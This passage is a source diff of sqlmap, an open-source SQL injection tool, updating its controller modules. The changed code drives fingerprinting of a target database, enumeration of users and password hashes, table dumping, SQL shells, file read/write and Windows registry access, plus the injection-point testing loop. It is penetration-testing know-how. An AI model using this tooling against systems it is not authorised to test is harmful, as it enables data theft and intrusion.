-Software Foundation version 2 of the License.
-
-sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with sqlmap; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
 """
 
 pass

lib/controller/action.py

@@ -1,52 +1,38 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
-
-Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
-
-sqlmap is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 2 of the License.
-
-sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with sqlmap; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
 """
 
 from lib.controller.handler import setHandler
-from lib.core.common import getHtmlErrorFp
+from lib.core.common import Backend
+from lib.core.common import Format
 from lib.core.data import conf
 from lib.core.data import kb
-from lib.core.dump import dumper
-from lib.core.exception import sqlmapUnsupportedDBMSException
+from lib.core.data import logger
+from lib.core.data import paths
+from lib.core.enums import CONTENT_TYPE
+from lib.core.exception import SqlmapNoneDataException
+from lib.core.exception import SqlmapUnsupportedDBMSException
 from lib.core.settings import SUPPORTED_DBMS
-from lib.techniques.blind.timebased import timeTest
-from lib.techniques.inband.union.test import unionTest
-from lib.techniques.outband.stacked import stackedTest
+from lib.techniques.brute.use import columnExists
+from lib.techniques.brute.use import tableExists
 
 def action():
     """
     This function exploit the SQL injection on the affected
-    url parameter and extract requested data from the
+    URL parameter and extract requested data from the
     back-end database management system or operating system
     if possible
     """
 
     # First of all we have to identify the back-end database management
     # system to be able to go ahead with the injection
-    conf.dbmsHandler = setHandler()
+    setHandler()
 
-    if not conf.dbmsHandler:
-        htmlParsed = getHtmlErrorFp()
+    if not Backend.getDbms() or not conf.dbmsHandler:
+        htmlParsed = Format.getErrorParsedDBMSes()
 
         errMsg = "sqlmap was not able to fingerprint the "
         errMsg += "back-end database management system"
@@ -59,76 +45,109 @@ def action():
         if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:
             errMsg += ". Do not specify the back-end DBMS manually, "
             errMsg += "sqlmap will fingerprint the DBMS for you"
+        elif kb.nullConnection:
+            errMsg += ". You can try to rerun without using optimization "
+            errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection")
         else:
-            errMsg += ". Support for this DBMS will be implemented if "
-            errMsg += "you ask, just drop us an email"
+            errMsg += ". Support for this DBMS will be implemented at "
+            errMsg += "some point"
 
-        raise sqlmapUnsupportedDBMSException, errMsg
+        raise SqlmapUnsupportedDBMSException(errMsg)
 
-    print "%s\n" % conf.dbmsHandler.getFingerprint()
-
-    # Techniques options
-    if conf.stackedTest:
-        dumper.string("stacked queries support", stackedTest())
-
-    if conf.timeTest:
-        dumper.string("time based blind sql injection payload", timeTest())
-
-    if ( conf.unionUse or conf.unionTest ) and not kb.unionPosition:
-        dumper.string("valid union", unionTest())
+    conf.dumper.singleString(conf.dbmsHandler.getFingerprint())
 
     # Enumeration options
     if conf.getBanner:
-        dumper.string("banner", conf.dbmsHandler.getBanner())
+        conf.dumper.banner(conf.dbmsHandler.getBanner())
 
     if conf.getCurrentUser:
-        dumper.string("current user", conf.dbmsHandler.getCurrentUser())
+        conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())
 
     if conf.getCurrentDb:
-        dumper.string("current database", conf.dbmsHandler.getCurrentDb())
+        conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())
+
+    if conf.getHostname:
+        conf.dumper.hostname(conf.dbmsHandler.getHostname())
 
     if conf.isDba:
-        dumper.string("current user is DBA", conf.dbmsHandler.isDba())
+        conf.dumper.dba(conf.dbmsHandler.isDba())
 
     if conf.getUsers:
-        dumper.lister("database management system users", conf.dbmsHandler.getUsers())
+        conf.dumper.users(conf.dbmsHandler.getUsers())
 
     if conf.getPasswordHashes:
-        dumper.userSettings("database management system users password hashes",
-                            conf.dbmsHandler.getPasswordHashes(), "password hash")
+        try:
+            conf.dumper.userSettings("database management system users password hashes",
+                                    conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
+        except SqlmapNoneDataException, ex:
+            logger.critical(ex)
+        except:
+            raise
 
     if conf.getPrivileges:
-        dumper.userSettings("database management system users privileges",
-                            conf.dbmsHandler.getPrivileges(), "privilege")
+        try:
+            conf.dumper.userSettings("database management system users privileges",
+                                    conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
+        except SqlmapNoneDataException, ex:
+            logger.critical(ex)
+        except:
+            raise
+
+    if conf.getRoles:
+        try:
+            conf.dumper.userSettings("database management system users roles",
+                                    conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
+        except SqlmapNoneDataException, ex:
+            logger.critical(ex)
+        except:
+            raise
 
     if conf.getDbs:
-        dumper.lister("available databases", conf.dbmsHandler.getDbs())
+        conf.dumper.dbs(conf.dbmsHandler.getDbs())
 
     if conf.getTables:
-        dumper.dbTables(conf.dbmsHandler.getTables())
+        conf.dumper.dbTables(conf.dbmsHandler.getTables())
+
+    if conf.commonTables:
+        conf.dumper.dbTables(tableExists(paths.COMMON_TABLES))
+
+    if conf.getSchema:
+        conf.dumper.dbTableColumns(conf.dbmsHandler.getSchema(), CONTENT_TYPE.SCHEMA)
 
     if conf.getColumns:
-        dumper.dbTableColumns(conf.dbmsHandler.getColumns())
+        conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns(), CONTENT_TYPE.COLUMNS)
+
+    if conf.getCount:
+        conf.dumper.dbTablesCount(conf.dbmsHandler.getCount())
+
+    if conf.commonColumns:
+        conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS))
 
     if conf.dumpTable:
-        dumper.dbTableValues(conf.dbmsHandler.dumpTable())
+        conf.dbmsHandler.dumpTable()
 
     if conf.dumpAll:
         conf.dbmsHandler.dumpAll()
 
+    if conf.search:
+        conf.dbmsHandler.search()
+
     if conf.query:
-        dumper.string(conf.query, conf.dbmsHandler.sqlQuery(conf.query))
+        conf.dumper.query(conf.query, conf.dbmsHandler.sqlQuery(conf.query))
 
     if conf.sqlShell:
         conf.dbmsHandler.sqlShell()
 
+    if conf.sqlFile:
+        conf.dbmsHandler.sqlFile()
+
     # User-defined function options
     if conf.udfInject:
         conf.dbmsHandler.udfInjectCustom()
 
     # File system options
     if conf.rFile:
-        dumper.string("%s file saved to" % conf.rFile, conf.dbmsHandler.readFile(conf.rFile), sort=False)
+        conf.dumper.rFile(conf.dbmsHandler.readFile(conf.rFile))
 
     if conf.wFile:
         conf.dbmsHandler.writeFile(conf.wFile, conf.dFile, conf.wFileType)
@@ -151,7 +170,7 @@ def action():
 
     # Windows registry options
     if conf.regRead:
-        dumper.string("Registry key value data", conf.dbmsHandler.regRead())
+        conf.dumper.registerValue(conf.dbmsHandler.regRead())
 
     if conf.regAdd:
         conf.dbmsHandler.regAdd()
@@ -162,3 +181,6 @@ def action():
     # Miscellaneous options
     if conf.cleanup:
         conf.dbmsHandler.cleanup()
+
+    if conf.direct:
+        conf.dbmsConnector.close()

lib/controller/controller.py

@@ -1,27 +1,13 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
-
-Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
-
-sqlmap is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 2 of the License.
-
-sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with sqlmap; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
 """
 
+import os
+import re
+
 from lib.controller.action import action
 from lib.controller.checks import checkSqlInjection
 from lib.controller.checks import checkDynParam
@@ -29,33 +15,100 @@ from lib.controller.checks import checkStability
 from lib.controller.checks import checkString
 from lib.controller.checks import checkRegexp
 from lib.controller.checks import checkConnection
-from lib.core.common import paramToDict
+from lib.controller.checks import checkNullConnection
+from lib.controller.checks import checkWaf
+from lib.controller.checks import heuristicCheckSqlInjection
+from lib.controller.checks import identifyWaf
+from lib.core.agent import agent
+from lib.core.common import dataToStdout
+from lib.core.common import extractRegexResult
+from lib.core.common import getFilteredPageContent
+from lib.core.common import getPublicTypeMembers
+from lib.core.common import getSafeExString
+from lib.core.common import hashDBRetrieve
+from lib.core.common import hashDBWrite
+from lib.core.common import intersect
+from lib.core.common import isListLike
 from lib.core.common import parseTargetUrl
+from lib.core.common import popValue
+from lib.core.common import pushValue
+from lib.core.common import randomStr
 from lib.core.common import readInput
+from lib.core.common import safeCSValue
+from lib.core.common import showHttpErrorCodes
+from lib.core.common import urlencode
+from lib.core.common import urldecode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
-from lib.core.exception import sqlmapNotVulnerableException
-from lib.core.session import setInjection
-from lib.core.target import createTargetDirs
+from lib.core.enums import CONTENT_TYPE
+from lib.core.enums import HASHDB_KEYS
+from lib.core.enums import HEURISTIC_TEST
+from lib.core.enums import HTTPMETHOD
+from lib.core.enums import PAYLOAD
+from lib.core.enums import PLACE
+from lib.core.exception import SqlmapBaseException
+from lib.core.exception import SqlmapNoneDataException
+from lib.core.exception import SqlmapNotVulnerableException
+from lib.core.exception import SqlmapSilentQuitException
+from lib.core.exception import SqlmapValueException
+from lib.core.exception import SqlmapUserQuitException
+from lib.core.settings import ASP_NET_CONTROL_REGEX
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
+from lib.core.settings import EMPTY_FORM_FIELDS_REGEX
+from lib.core.settings import IGNORE_PARAMETERS
+from lib.core.settings import LOW_TEXT_PERCENT
+from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX
+from lib.core.settings import HOST_ALIASES
+from lib.core.settings import REFERER_ALIASES
+from lib.core.settings import USER_AGENT_ALIASES
 from lib.core.target import initTargetEnv
-from lib.utils.parenthesis import checkForParenthesis
+from lib.core.target import setupTargetEnv
+from thirdparty.pagerank.pagerank import get_pagerank
 
-def __selectInjection(injData):
+def _selectInjection():
     """
     Selection function for injection place, parameters and type.
     """
 
-    message  = "there were multiple injection points, please select the "
-    message += "one to use to go ahead:\n"
+    points = {}
 
-    for i in xrange(0, len(injData)):
-        injPlace     = injData[i][0]
-        injParameter = injData[i][1]
-        injType      = injData[i][2]
+    for injection in kb.injections:
+        place = injection.place
+        parameter = injection.parameter
+        ptype = injection.ptype
 
-        message += "[%d] place: %s, parameter: " % (i, injPlace)
-        message += "%s, type: %s" % (injParameter, injType)
+        point = (place, parameter, ptype)
+
+        if point not in points:
+            points[point] = injection
+        else:
+            for key in points[point].keys():
+                if key != 'data':
+                    points[point][key] = points[point][key] or injection[key]
+            points[point]['data'].update(injection['data'])
+
+    if len(points) == 1:
+        kb.injection = kb.injections[0]
+
+    elif len(points) > 1:
+        message = "there were multiple injection points, please select "
+        message += "the one to use for following injections:\n"
+
+        points = []
+
+        for i in xrange(0, len(kb.injections)):
+            place = kb.injections[i].place
+            parameter = kb.injections[i].parameter
+            ptype = kb.injections[i].ptype
+            point = (place, parameter, ptype)
+
+            if point not in points:
+                points.append(point)
+                ptype = PAYLOAD.PARAMETER[ptype] if isinstance(ptype, int) else ptype
+
+                message += "[%d] place: %s, parameter: " % (i, place)
+                message += "%s, type: %s" % (parameter, ptype)
 
                 if i == 0:
                     message += " (default)"
@@ -65,21 +118,131 @@ def __selectInjection(injData):
         message += "[q] Quit"
         select = readInput(message, default="0")
 
-    if not select:
-        index = 0
-
-    elif select.isdigit() and int(select) < len(injData) and int(select) >= 0:
+        if select.isdigit() and int(select) < len(kb.injections) and int(select) >= 0:
             index = int(select)
-
-    elif select[0] in ( "Q", "q" ):
-        return "Quit"
-
+        elif select[0] in ("Q", "q"):
+            raise SqlmapUserQuitException
         else:
-        warnMsg = "Invalid choice, retry"
-        logger.warn(warnMsg)
-        __selectInjection(injData)
+            errMsg = "invalid choice"
+            raise SqlmapValueException(errMsg)
 
-    return injData[index]
+        kb.injection = kb.injections[index]
+
+def _formatInjection(inj):
+    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else inj.place
+    data = "Parameter: %s (%s)\n" % (inj.parameter, paramType)
+
+    for stype, sdata in inj.data.items():
+        title = sdata.title
+        vector = sdata.vector
+        comment = sdata.comment
+        payload = agent.adjustLateValues(sdata.payload)
+        if inj.place == PLACE.CUSTOM_HEADER:
+            payload = payload.split(',', 1)[1]
+        if stype == PAYLOAD.TECHNIQUE.UNION:
+            count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1
+            title = re.sub(r"\d+ to \d+", str(count), title)
+            vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
+            if count == 1:
+                title = title.replace("columns", "column")
+        elif comment:
+            vector = "%s%s" % (vector, comment)
+        data += "    Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
+        data += "    Title: %s\n" % title
+        data += "    Payload: %s\n" % urldecode(payload, unsafe="&", plusspace=(inj.place != PLACE.GET and kb.postSpaceToPlus))
+        data += "    Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
+
+    return data
+
+def _showInjections():
+    if kb.testQueryCount > 0:
+        header = "sqlmap identified the following injection point(s) with "
+        header += "a total of %d HTTP(s) requests" % kb.testQueryCount
+    else:
+        header = "sqlmap resumed the following injection point(s) from stored session"
+
+    if hasattr(conf, "api"):
+        conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES)
+    else:
+        data = "".join(set(map(lambda x: _formatInjection(x), kb.injections))).rstrip("\n")
+        conf.dumper.string(header, data)
+
+    if conf.tamper:
+        warnMsg = "changes made by tampering scripts are not "
+        warnMsg += "included in shown payload content(s)"
+        logger.warn(warnMsg)
+
+    if conf.hpp:
+        warnMsg = "changes made by HTTP parameter pollution are not "
+        warnMsg += "included in shown payload content(s)"
+        logger.warn(warnMsg)
+
+def _randomFillBlankFields(value):
+    retVal = value
+
+    if extractRegexResult(EMPTY_FORM_FIELDS_REGEX, value):
+        message = "do you want to fill blank fields with random values? [Y/n] "
+        test = readInput(message, default="Y")
+        if not test or test[0] in ("y", "Y"):
+            for match in re.finditer(EMPTY_FORM_FIELDS_REGEX, retVal):
+                item = match.group("result")
+                if not any(_ in item for _ in IGNORE_PARAMETERS) and not re.search(ASP_NET_CONTROL_REGEX, item):
+                    if item[-1] == DEFAULT_GET_POST_DELIMITER:
+                        retVal = retVal.replace(item, "%s%s%s" % (item[:-1], randomStr(), DEFAULT_GET_POST_DELIMITER))
+                    else:
+                        retVal = retVal.replace(item, "%s%s" % (item, randomStr()))
+
+    return retVal
+
+def _saveToHashDB():
+    injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True)
+    if not isListLike(injections):
+        injections = []
+    injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)
+
+    _ = dict()
+    for injection in injections:
+        key = (injection.place, injection.parameter, injection.ptype)
+        if key not in _:
+            _[key] = injection
+        else:
+            _[key].data.update(injection.data)
+    hashDBWrite(HASHDB_KEYS.KB_INJECTIONS, _.values(), True)
+
+    _ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True)
+    hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, kb.absFilePaths | (_ if isinstance(_, set) else set()), True)
+
+    if not hashDBRetrieve(HASHDB_KEYS.KB_CHARS):
+        hashDBWrite(HASHDB_KEYS.KB_CHARS, kb.chars, True)
+
+    if not hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS):
+        hashDBWrite(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, kb.dynamicMarkings, True)
+
+def _saveToResultsFile():
+    if not conf.resultsFP:
+        return
+
+    results = {}
+    techniques = dict(map(lambda x: (x[1], x[0]), getPublicTypeMembers(PAYLOAD.TECHNIQUE)))
+
+    for inj in kb.injections:
+        if inj.place is None or inj.parameter is None:
+            continue
+
+        key = (inj.place, inj.parameter)
+        if key not in results:
+            results[key] = []
+
+        results[key].extend(inj.data.keys())
+
+    for key, value in results.items():
+        place, parameter = key
+        line = "%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(map(lambda x: techniques[x][0].upper(), sorted(value))), os.linesep)
+        conf.resultsFP.writelines(line)
+
+    if not results:
+        line = "%s,,,%s" % (conf.url, os.linesep)
+        conf.resultsFP.writelines(line)
 
 def start():
     """
@@ -88,164 +251,368 @@ def start():
     check if they are dynamic and SQL injection affected
     """
 
-    if conf.url:
-        kb.targetUrls.add(( conf.url, conf.method, conf.data, conf.cookie ))
+    if conf.direct:
+        initTargetEnv()
+        setupTargetEnv()
+        action()
+        return True
 
-    if conf.configFile and not kb.targetUrls:
+    if conf.url and not any((conf.forms, conf.crawlDepth)):
+        kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None))
+
+    if conf.configFile and not kb.targets:
         errMsg = "you did not edit the configuration file properly, set "
-        errMsg += "the target url, list of targets or google dork"
+        errMsg += "the target URL, list of targets or google dork"
         logger.error(errMsg)
+        return False
 
-    if kb.targetUrls and len(kb.targetUrls) > 1:
-        infoMsg = "sqlmap got a total of %d targets" % len(kb.targetUrls)
+    if kb.targets and len(kb.targets) > 1:
+        infoMsg = "sqlmap got a total of %d targets" % len(kb.targets)
         logger.info(infoMsg)
 
     hostCount = 0
-    cookieStr               = ""
-    setCookieAsInjectable   = True
+    initialHeaders = list(conf.httpHeaders)
 
-    for targetUrl, targetMethod, targetData, targetCookie in kb.targetUrls:
+    for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
+        try:
             conf.url = targetUrl
-        conf.method = targetMethod
+            conf.method = targetMethod.upper() if targetMethod else targetMethod
             conf.data = targetData
             conf.cookie = targetCookie
-        injData     = []
+            conf.httpHeaders = list(initialHeaders)
+            conf.httpHeaders.extend(targetHeaders or [])
+
+            initTargetEnv()
+            parseTargetUrl()
+
+            testSqlInj = False
+
+            if PLACE.GET in conf.parameters and not any([conf.data, conf.testParameter]):
+                for parameter in re.findall(r"([^=]+)=([^%s]+%s?|\Z)" % (re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER, re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]):
+                    paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0])
+
+                    if paramKey not in kb.testedParams:
+                        testSqlInj = True
+                        break
+            else:
+                paramKey = (conf.hostname, conf.path, None, None)
+                if paramKey not in kb.testedParams:
+                    testSqlInj = True
+
+            if testSqlInj and conf.hostname in kb.vulnHosts:
+                if kb.skipVulnHost is None:
+                    message = "SQL injection vulnerability has already been detected "
+                    message += "against '%s'. Do you want to skip " % conf.hostname
+                    message += "further tests involving it? [Y/n]"
+                    kb.skipVulnHost = readInput(message, default="Y").upper() != 'N'
+                testSqlInj = not kb.skipVulnHost
+
+            if not testSqlInj:
+                infoMsg = "skipping '%s'" % targetUrl
+                logger.info(infoMsg)
+                continue
 
             if conf.multipleTargets:
                 hostCount += 1
-            message = "url %d:\n%s %s" % (hostCount, conf.method or "GET", targetUrl)
+
+                if conf.forms and conf.method:
+                    message = "[#%d] form:\n%s %s" % (hostCount, conf.method, targetUrl)
+                else:
+                    message = "URL %d:\n%s %s%s" % (hostCount, HTTPMETHOD.GET, targetUrl, " (PageRank: %s)" % get_pagerank(targetUrl) if conf.googleDork and conf.pageRank else "")
 
                 if conf.cookie:
                     message += "\nCookie: %s" % conf.cookie
 
-            if conf.data:
-                message += "\nPOST data: %s" % conf.data
+                if conf.data is not None:
+                    message += "\n%s data: %s" % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST, urlencode(conf.data) if conf.data else "")
 
-            message += "\ndo you want to test this url? [Y/n/q]"
+                if conf.forms and conf.method:
+                    if conf.method == HTTPMETHOD.GET and targetUrl.find("?") == -1:
+                        continue
+
+                    message += "\ndo you want to test this form? [Y/n/q] "
                     test = readInput(message, default="Y")
 
-            if not test:
-                pass
+                    if not test or test[0] in ("y", "Y"):
+                        if conf.method != HTTPMETHOD.GET:
+                            message = "Edit %s data [default: %s]%s: " % (conf.method, urlencode(conf.data) if conf.data else "None", " (Warning: blank fields detected)" if conf.data and extractRegexResult(EMPTY_FORM_FIELDS_REGEX, conf.data) else "")
+                            conf.data = readInput(message, default=conf.data)
+                            conf.data = _randomFillBlankFields(conf.data)
+                            conf.data = urldecode(conf.data) if conf.data and urlencode(DEFAULT_GET_POST_DELIMITER, None) not in conf.data else conf.data
+
+                        else:
+                            if targetUrl.find("?") > -1:
+                                firstPart = targetUrl[:targetUrl.find("?")]
+                                secondPart = targetUrl[targetUrl.find("?") + 1:]
+                                message = "Edit GET data [default: %s]: " % secondPart
+                                test = readInput(message, default=secondPart)
+                                test = _randomFillBlankFields(test)
+                                conf.url = "%s?%s" % (firstPart, test)
+
+                        parseTargetUrl()
+
                     elif test[0] in ("n", "N"):
                         continue
                     elif test[0] in ("q", "Q"):
                         break
 
-            logMsg = "testing url %s" % targetUrl
-            logger.info(logMsg)
-
-        parseTargetUrl()
-        createTargetDirs()
-        initTargetEnv()
-
-        if not checkConnection() or not checkString() or not checkRegexp():
-            continue
-
-        if not conf.dropSetCookie:
-            for _, cookie in enumerate(conf.cj):
-                cookie = str(cookie)
-                index  = cookie.index(" for ")
-    
-                cookieStr += "%s;" % cookie[8:index]
-
-            if cookieStr:
-                cookieStr = cookieStr[:-1]
-    
-                if "Cookie" in conf.parameters:
-                    message  = "you provided an HTTP Cookie header value. "
-                    message += "The target url provided its own Cookie within "
-                    message += "the HTTP Set-Cookie header. Do you want to "
-                    message += "continue using the HTTP Cookie values that "
-                    message += "you provided? [Y/n] "
+                else:
+                    message += "\ndo you want to test this URL? [Y/n/q]"
                     test = readInput(message, default="Y")
 
                     if not test or test[0] in ("y", "Y"):
-                        setCookieAsInjectable = False
+                        pass
+                    elif test[0] in ("n", "N"):
+                        dataToStdout(os.linesep)
+                        continue
+                    elif test[0] in ("q", "Q"):
+                        break
 
-                if setCookieAsInjectable:
-                    conf.httpHeaders.append(("Cookie", cookieStr))
-                    conf.parameters["Cookie"] = cookieStr
-                    __paramDict = paramToDict("Cookie", cookieStr)
+                    infoMsg = "testing URL '%s'" % targetUrl
+                    logger.info(infoMsg)
 
-                    if __paramDict:
-                        conf.paramDict["Cookie"] = __paramDict
-                        __testableParameters = True
+            setupTargetEnv()
 
-        if not kb.injPlace or not kb.injParameter or not kb.injType:
-            if not conf.string and not conf.regexp and not conf.eRegexp:
+            if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
+                continue
+
+            checkWaf()
+
+            if conf.identifyWaf:
+                identifyWaf()
+
+            if conf.nullConnection:
+                checkNullConnection()
+
+            if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
+                and (kb.injection.place is None or kb.injection.parameter is None):
+
+                if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
                     # NOTE: this is not needed anymore, leaving only to display
                     # a warning message to the user in case the page is not stable
                     checkStability()
 
-            for place in conf.parameters.keys():
-                if not conf.paramDict.has_key(place):
+                # Do a little prioritization reorder of a testable parameter list
+                parameters = conf.parameters.keys()
+
+                # Order of testing list (first to last)
+                orderList = (PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER, PLACE.URI, PLACE.POST, PLACE.GET)
+
+                for place in orderList[::-1]:
+                    if place in parameters:
+                        parameters.remove(place)
+                        parameters.insert(0, place)
+
+                proceed = True
+                for place in parameters:
+                    # Test User-Agent and Referer headers only if
+                    # --level >= 3
+                    skip = (place == PLACE.USER_AGENT and conf.level < 3)
+                    skip |= (place == PLACE.REFERER and conf.level < 3)
+
+                    # Test Host header only if
+                    # --level >= 5
+                    skip |= (place == PLACE.HOST and conf.level < 5)
+
+                    # Test Cookie header only if --level >= 2
+                    skip |= (place == PLACE.COOKIE and conf.level < 2)
+
+                    skip |= (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.skip, True) not in ([], None))
+                    skip |= (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.skip, True) not in ([], None))
+                    skip |= (place == PLACE.COOKIE and intersect(PLACE.COOKIE, conf.skip, True) not in ([], None))
+                    skip |= (place == PLACE.HOST and intersect(PLACE.HOST, conf.skip, True) not in ([], None))
+
+                    skip &= not (place == PLACE.USER_AGENT and intersect(USER_AGENT_ALIASES, conf.testParameter, True))
+                    skip &= not (place == PLACE.REFERER and intersect(REFERER_ALIASES, conf.testParameter, True))
+                    skip &= not (place == PLACE.HOST and intersect(HOST_ALIASES, conf.testParameter, True))
+                    skip &= not (place == PLACE.COOKIE and intersect((PLACE.COOKIE,), conf.testParameter, True))
+
+                    if skip:
+                        continue
+
+                    if kb.testOnlyCustom and place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
+                        continue
+
+                    if place not in conf.paramDict:
                         continue
 
                     paramDict = conf.paramDict[place]
 
+                    paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
+
                     for parameter, value in paramDict.items():
+                        if not proceed:
+                            break
+
+                        kb.vainRun = False
                         testSqlInj = True
+                        paramKey = (conf.hostname, conf.path, place, parameter)
 
-                    # Avoid dinamicity test if the user provided the
-                    # parameter manually
-                    if parameter in conf.testParameter:
-                        pass
-
-                    elif not checkDynParam(place, parameter, value):
-                        warnMsg = "%s parameter '%s' is not dynamic" % (place, parameter)
-                        logger.warn(warnMsg)
+                        if paramKey in kb.testedParams:
                             testSqlInj = False
 
-                    else:
-                        logMsg = "%s parameter '%s' is dynamic" % (place, parameter)
-                        logger.info(logMsg)
-
-                    if testSqlInj:
-                        for parenthesis in range(0, 4):
-                            logMsg  = "testing sql injection on %s " % place
-                            logMsg += "parameter '%s' with " % parameter
-                            logMsg += "%d parenthesis" % parenthesis
-                            logger.info(logMsg)
-
-                            injType = checkSqlInjection(place, parameter, value, parenthesis)
-
-                            if injType:
-                                injData.append((place, parameter, injType))
-
-                                break
-                            else:
-                                infoMsg  = "%s parameter '%s' is not " % (place, parameter)
-                                infoMsg += "injectable with %d parenthesis" % parenthesis
+                            infoMsg = "skipping previously processed %s parameter '%s'" % (paramType, parameter)
                             logger.info(infoMsg)
 
-                        if not injData:
-                            warnMsg  = "%s parameter '%s' is not " % (place, parameter)
+                        elif parameter in conf.testParameter:
+                            pass
+
+                        elif parameter == conf.rParam:
+                            testSqlInj = False
+
+                            infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter)
+                            logger.info(infoMsg)
+
+                        elif parameter in conf.skip:
+                            testSqlInj = False
+
+                            infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
+                            logger.info(infoMsg)
+
+                        elif parameter == conf.csrfToken:
+                            testSqlInj = False
+
+                            infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter
+                            logger.info(infoMsg)
+
+                        # Ignore session-like parameters for --level < 4
+                        elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
+                            testSqlInj = False
+
+                            infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
+                            logger.info(infoMsg)
+
+                        elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech or conf.skipStatic:
+                            check = checkDynParam(place, parameter, value)
+
+                            if not check:
+                                warnMsg = "%s parameter '%s' does not appear dynamic" % (paramType, parameter)
+                                logger.warn(warnMsg)
+
+                                if conf.skipStatic:
+                                    infoMsg = "skipping static %s parameter '%s'" % (paramType, parameter)
+                                    logger.info(infoMsg)
+
+                                    testSqlInj = False
+                            else:
+                                infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter)
+                                logger.info(infoMsg)
+
+                        kb.testedParams.add(paramKey)
+
+                        if testSqlInj:
+                            try:
+                                if place == PLACE.COOKIE:
+                                    pushValue(kb.mergeCookies)
+                                    kb.mergeCookies = False
+
+                                check = heuristicCheckSqlInjection(place, parameter)
+
+                                if check != HEURISTIC_TEST.POSITIVE:
+                                    if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
+                                        infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
+                                        logger.info(infoMsg)
+                                        continue
+
+                                infoMsg = "testing for SQL injection on %s " % paramType
+                                infoMsg += "parameter '%s'" % parameter
